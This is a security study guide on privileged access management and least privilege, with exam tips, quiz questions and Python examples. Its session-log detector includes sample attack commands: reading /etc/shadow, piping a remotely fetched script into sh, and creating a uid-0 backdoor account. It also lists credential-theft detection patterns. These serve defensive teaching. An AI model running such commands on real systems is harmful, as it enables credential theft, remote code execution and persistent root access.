Fatskills
Study Guide: Principles of Information Security: Privileged Access Management (PAM) and Least Privilege
Source: https://www.fatskills.com/first-aid/chapter/information-security-privileged-access-management-pam-and-least-privilege

Principles of Information Security: Privileged Access Management (PAM) and Least Privilege

By Fatskills Exam Guides Team — the exam nerds behind 28,500+ quizzes and 2.1M practice questions across 500+ global exams.




What This Is

Privileged Access Management (PAM) is the practice of controlling, monitoring, and securing elevated ("privileged") access to critical systems, data, and infrastructure. Least Privilege is the principle of granting users, accounts, and processes only the minimum permissions needed to perform their tasks, nothing more. The two are foundational because privileged credentials feature in most serious breaches; Forrester has estimated that around 80% of breaches involve them. A real-world example: in the 2020 Twitter Bitcoin scam, attackers phished a Twitter employee's credentials, then used internal admin tools to hijack high-profile accounts (e.g., Elon Musk, Barack Obama). Without PAM and least privilege, a single compromised account can escalate into a full-scale breach.


Key Terms & Concepts

  • PAM (Privileged Access Management): A framework to secure, monitor, and audit privileged accounts (e.g., admins, service accounts). Tools: CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
  • Least Privilege (Principle of Least Privilege, PoLP): Users/processes get only the permissions necessary for their role. Aligns with NIST SP 800-53 (AC-6) and ISO/IEC 27001 control A.9.2.3 in the 2013 edition (A.8.2, Privileged access rights, in the 2022 edition).
  • Privileged Account: Any account with elevated permissions (e.g., domain admin, root, database admin, cloud IAM roles).
  • Just-in-Time (JIT) Access: Temporary, time-bound privileged access granted only when needed (e.g., via PAM workflows). Reduces "standing privilege" risk.
  • Session Monitoring: Real-time recording and auditing of privileged sessions (e.g., CyberArk PSM, BeyondTrust Privileged Remote Access). PCI DSS 3.2.1 Req. 10.2.2 requires logging all actions taken by anyone with root or administrative privileges (Req. 10.2.1.2 in PCI DSS 4.0); session recording is how PAM tools satisfy it.
  • Credential Vaulting: Secure storage of privileged credentials (e.g., passwords, SSH keys) in an encrypted repository. Prevents hardcoding in scripts/configs.
  • Privilege Escalation: An attack where a user gains higher-level permissions than intended (e.g., MITRE ATT&CK T1068). Defenses: PAM + least privilege + patching.
  • Service Account: Non-human account used by an application or service (e.g., sql_svc). Often over-permissioned and rarely rotated because nobody "owns" it; vault it and rotate its credential automatically through PAM. (NIST SP 800-63B covers human authenticators and does not mandate periodic rotation; automated service-account rotation is a PAM practice.)
  • Break-Glass Account: Emergency admin account for use only when normal access paths fail (e.g., an identity-provider outage). Credentials are kept offline (e.g., sealed in a physical safe) or checked out from the vault, every use triggers an alert and review, and the credential is rotated afterwards.
  • Shared Account: Multiple users sharing one credential (e.g., admin/admin). Anti-pattern—violates accountability. Replace with individual accounts + PAM.
  • Zero Standing Privileges (ZSP): No permanent privileged access; every elevation is JIT and ephemeral, so there is no standing admin credential for an attacker to steal. A zero-trust idea (Google's BeyondCorp applies the same "verify every access" thinking to network access).
  • PAM Lifecycle: Provision-Monitor-Audit-Deprovision. Tools automate this (e.g., SailPoint, Okta Privileged Access).
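The JIT and Zero Standing Privileges entries above describe a grant that exists only for a bounded window. The following is an added example written for this guide, not code from CyberArk, BeyondTrust or any other PAM product: a minimal broker that behaves that way. The role names, ticket IDs, timeline and the 4-hour ceiling are assumptions.

```python
"""Added example (not vendor code): a minimal just-in-time privilege broker.

No account holds a privileged role permanently. A grant exists only between
request time and its expiry, every authorization check re-evaluates that
expiry, and each decision is written to an audit trail."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

MAX_TTL = timedelta(hours=4)  # assumed policy ceiling for a single elevation


@dataclass
class Grant:
    user: str
    role: str            # e.g. "root@db01" (hypothetical naming)
    justification: str   # ticket or reason, kept for the audit trail
    granted_at: datetime
    expires_at: datetime


@dataclass
class JitBroker:
    grants: list = field(default_factory=list)
    audit: list = field(default_factory=list)

    def request(self, user, role, justification, ttl, now):
        """Create a time-bound grant, or refuse and record why."""
        if not justification.strip():
            self.audit.append(("DENIED", user, role, "no justification"))
            raise PermissionError("justification required")
        if ttl > MAX_TTL:
            self.audit.append(("DENIED", user, role, f"ttl {ttl} > {MAX_TTL}"))
            raise PermissionError("requested TTL exceeds policy maximum")
        grant = Grant(user, role, justification, now, now + ttl)
        self.grants.append(grant)
        self.audit.append(("GRANTED", user, role, grant.expires_at.isoformat()))
        return grant

    def expire(self, now):
        """Drop grants whose TTL has elapsed; this is what removes standing privilege."""
        live = []
        for g in self.grants:
            if g.expires_at <= now:
                self.audit.append(("EXPIRED", g.user, g.role, g.expires_at.isoformat()))
            else:
                live.append(g)
        self.grants = live

    def is_authorized(self, user, role, now):
        """Every check re-evaluates expiry, so a stale grant never authorizes anything."""
        self.expire(now)
        return any(g.user == user and g.role == role for g in self.grants)


def demo():
    """Walk one elevation through its lifecycle; returns the decisions for inspection."""
    t0 = datetime(2024, 1, 15, 9, 0, tzinfo=timezone.utc)   # constructed timeline
    broker = JitBroker()
    result = {"before": broker.is_authorized("alice", "root@db01", t0)}
    broker.request("alice", "root@db01", "INC-1234: disk full on db01",
                   timedelta(minutes=30), t0)
    result["during"] = broker.is_authorized("alice", "root@db01", t0 + timedelta(minutes=10))
    result["after"] = broker.is_authorized("alice", "root@db01", t0 + timedelta(minutes=31))
    try:
        broker.request("bob", "root@db01", "INC-1235", timedelta(days=1), t0)
        result["long_ttl_denied"] = False
    except PermissionError:
        result["long_ttl_denied"] = True
    result["audit_events"] = [e[0] for e in broker.audit]
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point to notice is that `is_authorized` never trusts a cached decision: it calls `expire` first, so revocation needs no scheduler or human to remember. A real PAM workflow adds an approver step between `request` and the grant and ties the grant to a session recording.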

Step-by-Step / Process Flow

How to Implement PAM & Least Privilege

  1. Discover & Inventory Privileged Accounts
    • Use automated tools (e.g., BloodHound, CyberArk Discovery, Tenable.io) to scan for:
      • Local admin accounts
      • Service accounts (e.g., svc_sql)
      • Cloud IAM roles and policies (e.g., anything with AWS AdministratorAccess attached)
      • Default credentials (e.g., admin:password)
    • Output: a list of all privileged accounts, what each can do, and who owns it.

  2. Enforce Least Privilege
    • Remove unnecessary permissions (e.g., revoke Domain Admin from helpdesk staff).
    • Replace shared accounts with individual accounts + PAM.
    • Implement role-based access control (RBAC) (e.g., AWS IAM roles, Azure RBAC).
    • Use JIT access for temporary needs (e.g., CyberArk's "Request Access" workflow).

  3. Secure & Vault Credentials
    • Store passwords/SSH keys in a PAM vault (e.g., HashiCorp Vault, AWS Secrets Manager).
    • Rotate vaulted credentials automatically: service-account and shared secrets on a short schedule or after every check-out. For human passwords follow NIST SP 800-63B, which favours MFA and rotation on suspected compromise over a fixed calendar.
    • Eliminate hardcoded secrets in scripts/configs (e.g., replace password=12345 with a runtime call to the vault API).

  4. Monitor & Audit Privileged Sessions
    • Record all privileged sessions (e.g., CyberArk PSM, BeyondTrust).
    • Alert on suspicious activity (e.g., admin logging in at 3 AM, unusual command execution).
    • Integrate with a SIEM (e.g., Splunk, IBM QRadar) to correlate with other events.

  5. Deprovision & Review
    • Automate deprovisioning when employees leave or roles change (e.g., Okta + PAM integration).
    • Conduct quarterly access reviews (NIST SP 800-53 AC-2, Account Management).
    • Test with red teaming (e.g., simulate MITRE ATT&CK T1078 Valid Accounts abuse followed by privilege escalation).
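Steps 1 and 2 produce a pile of IAM policy documents and then ask you to decide which ones over-grant. As an added example for this guide (not an AWS, CyberArk or Tenable tool), the Python below lints AWS IAM policy JSON for the patterns that break least privilege: full wildcards, service-wide wildcards, wildcard resources, and a short watchlist of actions that are well-known privilege-escalation paths. The bucket name and the "lazy" policy are constructed; ADMIN_POLICY has the same shape as the AWS-managed AdministratorAccess document.

```python
"""Added example (not an AWS tool): least-privilege linter for IAM policy documents."""
import json

# Actions that let a principal expand its own rights; an Allow on these with a
# wildcard resource is an escalation path. Assumed watchlist, not exhaustive.
ESCALATION_ACTIONS = {
    "iam:PassRole", "iam:CreatePolicyVersion", "iam:AttachUserPolicy",
    "iam:AttachRolePolicy", "iam:PutUserPolicy", "sts:AssumeRole",
}


def _as_list(value):
    """IAM accepts a string or a list in Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def lint_policy(policy: dict) -> list:
    """Return (severity, statement_index, message) findings for one policy document."""
    findings = []
    for i, st in enumerate(_as_list(policy.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = _as_list(st.get("Action"))
        resources = _as_list(st.get("Resource"))
        any_resource = "*" in resources

        if "NotAction" in st or "NotResource" in st:
            findings.append(("HIGH", i, "NotAction/NotResource allows everything not listed"))
        if "*" in actions and any_resource:
            findings.append(("CRITICAL", i, "Action '*' on Resource '*' is full administrator"))
        for a in actions:
            if a != "*" and a.endswith(":*"):
                findings.append(("HIGH", i, f"service-wide wildcard {a}"))
            if a in ESCALATION_ACTIONS and any_resource:
                findings.append(("HIGH", i, f"{a} on Resource '*' is a privilege-escalation path"))
        if any_resource and not any(a == "*" or a.endswith(":*") for a in actions):
            findings.append(("MEDIUM", i, "specific actions but Resource '*'; scope to ARNs"))
    return findings


def worst_severity(findings):
    """Collapse a findings list to a single triage label."""
    order = {"CRITICAL": 3, "HIGH": 2, "MEDIUM": 1}
    return max((f[0] for f in findings), key=order.get, default="CLEAN")


# Constructed samples. ADMIN_POLICY mirrors the AWS-managed AdministratorAccess
# document; BACKUP_POLICY is the least-privilege shape for a job that only
# writes to one bucket; LAZY_POLICY is the kind of thing discovery turns up.
ADMIN_POLICY = json.loads("""
{"Version": "2012-10-17",
 "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}
""")

BACKUP_POLICY = json.loads("""
{"Version": "2012-10-17",
 "Statement": [
   {"Effect": "Allow",
    "Action": ["s3:PutObject", "s3:ListBucket"],
    "Resource": ["arn:aws:s3:::example-backups", "arn:aws:s3:::example-backups/*"]}]}
""")

LAZY_POLICY = json.loads("""
{"Version": "2012-10-17",
 "Statement": [
   {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
   {"Effect": "Allow", "Action": ["iam:PassRole"], "Resource": "*"}]}
""")

if __name__ == "__main__":
    for name, pol in [("admin", ADMIN_POLICY), ("backup", BACKUP_POLICY), ("lazy", LAZY_POLICY)]:
        print(name, worst_severity(lint_policy(pol)))
        for sev, idx, msg in lint_policy(pol):
            print(f"  [{sev}] statement {idx}: {msg}")
```

Feed it the output of `aws iam get-policy-version` or your discovery tool's export and sort by `worst_severity`; the CRITICAL and HIGH rows are the step-2 remediation queue. The MEDIUM rule is deliberately noisy, because some read-only actions legitimately need `Resource: "*"`; treat it as a prompt to check, not an automatic fail.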

Common Mistakes

Mistake: Assuming "admin" is the only privileged account.
Correction: Privileged accounts include service accounts, cloud IAM roles and policies, database admins, and even some application accounts. Scan for all of them.

Mistake: Granting permanent admin rights "just in case."
Correction: Use JIT access (e.g., CyberArk, BeyondTrust) to grant temporary privileges only when needed.

Mistake: Ignoring service accounts.
Correction: Service accounts are high-risk (often over-permissioned and rarely rotated). Use PAM vaults and automated rotation.

Mistake: Not monitoring privileged sessions.
Correction: Session recording is critical (PCI DSS 3.2.1 Req. 10.2.2 requires logging every action taken with root or administrative privileges). Without it, you cannot detect insider threats or credential misuse.

Mistake: Relying on manual processes for PAM.
Correction: Automate discovery, rotation, and deprovisioning. Manual PAM is error-prone and does not scale.
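The "Not monitoring privileged sessions" row is where most detection work happens. As an added example for this guide (not code from any SIEM or PAM product), the Python below runs three simple rules over a constructed privileged-session log: off-hours privileged logins, dangerous commands inside a recorded session, and a service account being driven interactively. The log format, hosts, users, business-hours window and command watchlist are all assumptions made for the demo.

```python
"""Added example (not vendor code): detection rules over a privileged-session log."""
import re
from datetime import datetime

# Constructed sample: one record per line, "timestamp host user event detail".
SAMPLE_LOG = """\
2024-01-15T09:02:11Z db01 alice LOGIN src=10.0.5.21
2024-01-15T09:03:40Z db01 alice CMD sudo systemctl restart postgresql
2024-01-15T09:04:02Z db01 alice LOGOUT -
2024-01-15T03:12:44Z db01 bob LOGIN src=203.0.113.9
2024-01-15T03:13:01Z db01 bob CMD cat /etc/shadow
2024-01-15T03:13:30Z db01 bob CMD curl http://203.0.113.9/x.sh | sh
2024-01-15T03:14:00Z db01 bob LOGOUT -
2024-01-15T14:20:00Z web01 svc_sql CMD useradd -o -u 0 backdoor
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(LOGIN|LOGOUT|CMD)\s+(.*)$")
BUSINESS_HOURS = range(7, 20)       # assumed 07:00-19:59 UTC
SERVICE_ACCOUNT_PREFIX = "svc_"     # assumed naming convention

# Commands that should not appear in a routine admin session (assumed watchlist).
SUSPICIOUS_CMDS = [
    ("credential file read", re.compile(r"/etc/shadow|sam\.hive|ntds\.dit")),
    ("pipe to shell", re.compile(r"\|\s*(?:ba|z)?sh\b")),
    ("uid-0 account created", re.compile(r"\buseradd\b.*\s-u\s*0\b")),
    ("setuid bit set", re.compile(r"\bchmod\s+(?:[ug]\+s|[4-7]\d{3})\b")),
]


def parse(log_text):
    """Yield (timestamp, host, user, event, detail) tuples; skip malformed lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m.group(2), m.group(3), m.group(4), m.group(5)


def detect(log_text):
    """Return a list of (rule, user, host, timestamp_iso, evidence) alerts."""
    alerts = []
    for ts, host, user, event, detail in parse(log_text):
        # Rule 1: privileged login outside the agreed window.
        if event == "LOGIN" and ts.hour not in BUSINESS_HOURS:
            alerts.append(("off_hours_privileged_login", user, host, ts.isoformat(), detail))
        if event == "CMD":
            # Rule 2: command matches the watchlist.
            for label, rx in SUSPICIOUS_CMDS:
                if rx.search(detail):
                    alerts.append(("suspicious_command", user, host, ts.isoformat(),
                                   f"{label}: {detail}"))
            # Rule 3: a service account should never run interactive commands.
            if user.startswith(SERVICE_ACCOUNT_PREFIX):
                alerts.append(("service_account_interactive", user, host, ts.isoformat(), detail))
    return alerts


def count_by_rule(alerts):
    """Summarise alerts per rule, the shape a SIEM dashboard would show."""
    counts = {}
    for a in alerts:
        counts[a[0]] = counts.get(a[0], 0) + 1
    return counts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

On the sample, alice's daytime restart raises nothing, bob's 03:12 login and both of his commands fire, and the `svc_sql` line fires twice (uid-0 account creation and interactive use of a service account). In a SIEM the same rules become correlation searches keyed on the PAM session ID, so an analyst can jump from the alert straight to the recording.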

Certification Exam Tips

CISSP

  • Management vs. Technical: CISSP focuses on governance, risk, and compliance (GRC). Know how PAM aligns with NIST, ISO 27001, and COBIT.
  • Scenario Questions: Expect questions like:

    "A company wants to reduce the risk of privileged account abuse. Which of the following is the MOST effective control?" Answer: Implement a PAM solution with JIT access and session monitoring. (Other options might include "password complexity" or "MFA," but PAM is the most comprehensive answer.)

Security+

  • Least Privilege vs. Separation of Duties (SoD):
    • Least Privilege = minimum permissions needed.
    • SoD = splitting tasks so no single person can complete a sensitive process alone (e.g., one person approves payments, another processes them).
  • PAM Tools: Know CyberArk, BeyondTrust, and HashiCorp Vault by name and purpose (even if you don't use them).

CEH

  • Attacker Perspective: CEH tests how attackers exploit weak PAM. Know:
    • Pass-the-Hash (PtH) (MITRE ATT&CK T1550.002) – reusing stolen NTLM hashes to authenticate and move laterally without ever cracking them.
    • Kerberoasting (MITRE ATT&CK T1558.003) – requesting service tickets for SPN-bearing service accounts and cracking them offline to recover the account password.
    • Defenses: PAM + credential vaulting + least privilege; long, random, automatically rotated service-account passwords (e.g., gMSAs) make Kerberoasted tickets uncrackable in practice.

Quick Check Questions

  1. A sysadmin needs temporary root access to a Linux server to troubleshoot an issue. Which PAM feature should be used to minimize risk?
     A) Permanent sudo access
     B) Just-in-Time (JIT) access
     C) Shared admin account
     D) Passwordless authentication
     Correct Answer: B) Just-in-Time (JIT) access. Explanation: JIT grants temporary, time-bound access, reducing the window of opportunity for misuse.

  2. During a security audit, an analyst discovers that a database service account has "db_owner" permissions but is only used to run backups. What is the BEST remediation?
     A) Delete the account
     B) Apply the principle of least privilege
     C) Enable MFA for the account
     D) Rotate the password
     Correct Answer: B) Apply the principle of least privilege. Explanation: The account should hold only backup-specific permissions (e.g., the SQL Server db_backupoperator role), not full db_owner. Rotating the password (D) is good hygiene but leaves the excess privilege in place.

  3. Which of the following is a PRIMARY benefit of session monitoring in PAM?
     A) Reducing password complexity requirements
     B) Detecting and recording privileged user activity
     C) Automating user provisioning
     D) Encrypting data at rest
     Correct Answer: B) Detecting and recording privileged user activity. Explanation: Session monitoring provides audit trails for forensic investigations and insider threat detection.

Last-Minute Cram Sheet

  1. PAM = Privileged Access Management – Controls, monitors, and secures admin accounts.
  2. Least Privilege = Minimum permissions needed (NIST SP 800-53 AC-6).
  3. JIT = Just-in-Time access – Temporary, time-bound privileges.
  4. Credential Vaulting – Secure storage of passwords/SSH keys (e.g., CyberArk, HashiCorp Vault).
  5. Session Monitoring – Records privileged sessions (PCI DSS 3.2.1 Req. 10.2.2: log all actions taken with root/admin privileges).
  6. Service Accounts – Non-human accounts; high-risk if over-permissioned.
  7. Break-Glass Accounts – Emergency admin accounts; credentials kept offline (e.g., sealed in a physical safe) or vaulted, with every use alerted and reviewed.
  8. Zero Standing Privileges (ZSP) – No permanent admin access; all access is JIT.
  9. Common Exam Trap: "PAM is only for human admins" – False (it includes service accounts, cloud roles, etc.).
  10. Another Trap: "Least privilege means no admin access" – False (it means only the admin access that is necessary).